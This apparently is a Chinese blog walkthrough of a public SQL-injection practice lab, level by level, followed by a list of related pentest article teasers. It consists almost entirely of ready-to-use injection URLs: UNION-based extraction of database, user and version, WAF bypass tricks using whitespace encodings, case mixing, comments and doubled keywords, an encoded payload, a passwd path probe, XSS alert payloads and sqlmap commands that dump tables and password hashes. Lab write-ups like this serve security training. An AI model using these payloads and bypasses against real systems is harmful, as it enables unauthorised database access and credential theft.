http://www.zixem.altervista.org/SQLi/

第一关

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=1--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 and 1=2--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1 order by 4--+

http://www.zixem.altervista.org/SQLi/level1.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level1.php?id=-1%20union%20select%201,2,3--+

sqlmap -u "注入点" --dbs

sqlmap -u "注入点" -D xx --tables

sqlmap -u "注入点" -D XX -T XX --columns

sqlmap -u "注入点" -D XX -T XX -C XX --dump

sqlmap -u "注入点" --users

sqlmap -u "注入点" --passwords

xss

http://www.zixem.altervista.org/SQLi/level1.php?id=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

第二关

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=4%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level2.php?showprofile=-4' union select 1,database(),3,4--+

第三关

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/level3.php?item=3%27%20order%20by%204--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20union%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,2,3,4--+

http://www.zixem.altervista.org/SQLi/level3.php?item=-3%27%20unionon%20select%201,database(),3,4--+

第四关

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=7%27%20order%20by%205--+

m.altervista.org/SQLi/level4.php?ebookid=7' order by 6--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,2,3,4,5--+

http://www.zixem.altervista.org/SQLi/level4.php?ebookid=-1%27%20union%20select%201,database(),3,4,5--+

第五关

http://www.zixem.altervista.org/SQLi/login_lvl5.php

http://www.zixem.altervista.org/SQLi/md5cracker.php?hash=d1fd6ef9af6cb677e09b1b0a68301e0c

第六关

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=1--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20and%201=2--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%205--+

http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=10%20order%20by%204--+

xss
http://www.zixem.altervista.org/SQLi/blind_lvl6.php?serial=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E

sqlmap 跑盲注

第七关

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=1--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20and%201=2--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/level7.php?id=1%20order%20by4--+

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+union+select+1,2,3--+

无回显

http://www.zixem.altervista.org/SQLi/level7.php?id=-1+UNION+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--+

第八关

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1\

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27%20and%201=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%27/**/and/**/1=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1' and '1'='1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1'/**/and/**/1=1--+

特殊字符绕过

A plus sign (+)

A simple URL encoded space (%20)

A null byte (%00)

A newline (%0a)

A tab (%09)

A carriage return (%0d)

构造poc

空格%20

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%20and%201=1

空字节%00

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%00and%001=1--+

换行\n %0a

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0aand%0a1=1--+

回车%0d

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%0dsand%0d1=1--+

Tab %09
http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

Tab %09

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=1--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09and%091=2--+

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09order%09by%093--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09select%091,2,3--

大小写

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09union%09sSelECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09/*!SeLECt*/%091,2,3--

url加密

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%2509union%2509select%25091,2,3--%20

使用特殊字符   *

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09sel*ect%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09se/**/lect%091,2,3--

关键词替换

http://www.zixem.altervista.org/SQLi/lvl8.php?id=1%09UNION%09SEselectLECT%091,2,3--

http://www.zixem.altervista.org/SQLi/lvl8.php?id=2%09UNION%09ALL%09SELSELECTECT%091,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3--

第九关

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' and 1=1--

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20and%201=2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' order by 2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1%27%20order%20by%203--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1' union select 1,2--+

http://www.zixem.altervista.org/SQLi/lvl9.php?id=1 and 1=2' union select "../etc/passwd","2"--+

第十关

http://www.zixem.altervista.org/SQLi/lvl10.php?x=ISwwYGAKYAo=

构造编码

1 AND 1=2 UNION SELECT 1,2--

使用Uuencode decoder 进行解码

<,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+#(M+0```

base64加密

PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

http://www.zixem.altervista.org/SQLi/lvl10.php?x=PCwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyMoTSswYGAKYAo=

构造注入语句

1 AND 1=2 UNION SELECT 1,CONCAT(user()," ",version())--

结果

M,2!!3D0@,3TR(%5.24].(%-%3$5#5"`Q+$-/3D-!5"AU<V5R*"DL(B`B+'9E*<G-I;VXH*2DM+0```

64编码

TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg

http://www.zixem.altervista.org/SQLi/lvl10.php?x=TSwyISEzRDBALDNUUiglNS4yNF0uKCUtJTMkNSM1ImBRKyQtLzNELSE1IkFVPFY1UioiREwoQmBCKyc5RQoqPEctSTtWWEgqMkRNKzBgYApg


参考文档 https://www.cnblogs.com/hack404/p/10387894.html

SQL Challenges靶机的更多相关文章

  1. SQL Challenges

    平台: http://www.zixem.altervista.org/SQLi/ Level 1 (Super Easy) http://www.zixem.altervista.org/SQLi/ ...

  2. XSS challenges靶机

    第一关 <script>alert(123)</script> "><svg onload=alert(123)> 第二关 <script&g ...

  3. web 攻击靶机解题过程

    sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

  4. 【新手篇】搭建DCN漏洞靶机及简单的SQL手工注入

    很多新手小白入门后发现想要学好“网安”技术,除了掌握基础理论知识,更需要经常模拟不同的漏洞环境,但是如果使用外网服务器练习,会存在一定风险,因此能够搭建一个本地的模拟环境去测试漏洞将是一个不错的方案. ...

  5. DVWA靶机-sql自动注入

    1. 使用dvwa靶机进行sql注入实战(注:当前靶机安全级别为low) 打开sql漏洞,发现输入不同的数字会返回不同的信息, 先尝试手工判断是否存在sql注入 一般sql注入语句像这样,我们构造的是 ...

  6. SQL注入测试平台 SQLol -6.CHALLENGES挑战

    SQLol上面的挑战共有14关,接下来我们一关一关来突破. Challenge 0 目的是让查询返回所有的用户名,而不是只有一个. SELECT username FROM users WHERE u ...

  7. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  8. DC-1 靶机渗透

    DC-1 靶机渗透 *概况*: 下载地址 https://www.vulnhub.com/entry/dc-1,292/ *官方描述:* DC-1 is a purposely built vulne ...

  9. sql注入学习小结

    /* 转载请注明出处,By:珍惜少年时 小知识,只是放在博客吃饭时无聊看看,大牛勿喷. */ 珍惜少年时博客,专注网络安全 web渗透测试 00x1爆所有库: mysql> select sch ...

随机推荐

  1. 【题解】codeforces 219D Choosing Capital for Treeland 树型dp

    题目描述 Treeland国有n个城市,这n个城市连成了一颗树,有n-1条道路连接了所有城市.每条道路只能单向通行.现在政府需要决定选择哪个城市为首都.假如城市i成为了首都,那么为了使首都能到达任意一 ...

  2. 【题解】Grape luogu1156改 dp

    考试时被数据坑了 题目 原题 传送门 题目描述: 众所周知的是oyyf 沉迷葡萄,今天的oyyf为了葡萄溜到了He 大佬家的葡萄园偷葡萄,可惜的是还没偷到葡萄He 大佬就来葡萄园了,吓的oyyf 直接 ...

  3. 20204107 孙嘉临《PYTHON程序设计》计算器设计实验二报告

    课程:<python程序设计> 班级:2041 姓名:孙嘉临 学号:20204107 实验教师:王志强 实验日期:2021年4月12日 必修/选修:公选课 ##一.实验内容 设计并完成一个 ...

  4. Docker 镜像针对不同语言的精简策略

    导航: 这里分为几个部分. 相关转载云原生:米开朗基杨 1.Docker减小镜像体积 2.Docker镜像针对不同语言的精简策略 对于刚接触容器的人来说,他们很容易被自己制作的 Docker 镜像体积 ...

  5. 使用CI/CD工具Github Action发布jar到Maven中央仓库

    之前发布开源项目Payment Spring Boot到Maven中央仓库我都是手动执行mvn deploy,在CI/CD大行其道的今天使用这种方式有点"原始".于是我一直在寻求一 ...

  6. sed 大括号 sed {} 的作用详解

    今天看别人写的脚本的时候,看到了sed  -r   {}   我看网上对于这个的记录比较少,所以就写了这篇随笔. 先看一下效果 cat  test.txt image: qqq/www/eee:TAG ...

  7. AcWing 239. 奇偶游戏

    小A和小B在玩一个游戏. 首先,小A写了一个由0和1组成的序列S,长度为N. 然后,小B向小A提出了M个问题. 在每个问题中,小B指定两个数 l 和 r,小A回答 S[l~r] 中有奇数个1还是偶数个 ...

  8. 并发王者课-铂金10:能工巧匠-ThreadLocal如何为线程打造私有数据空间

    欢迎来到<并发王者课>,本文是该系列文章中的第23篇,铂金中的第10篇. 说起ThreadLocal,相信你对它的名字一定不陌生.在并发编程中,它有着较高的出场率,并且也是面试中的高频面试 ...

  9. CentOS-Docker安装MongoDB(单点)

    下载镜像 $ docker pull mongo 创建相关目录 $ mkdir -p /usr/mongo/data /usr/mongo/dump 运行镜像 $ docker run --resta ...

  10. 修改MySQL时区

    说明: 1.Windows版本暂无发现问题 2.CentOS-Docker版本需要修改时区 通过sql命令临时修改 mysql> set global time_zone = '+8:00'; ...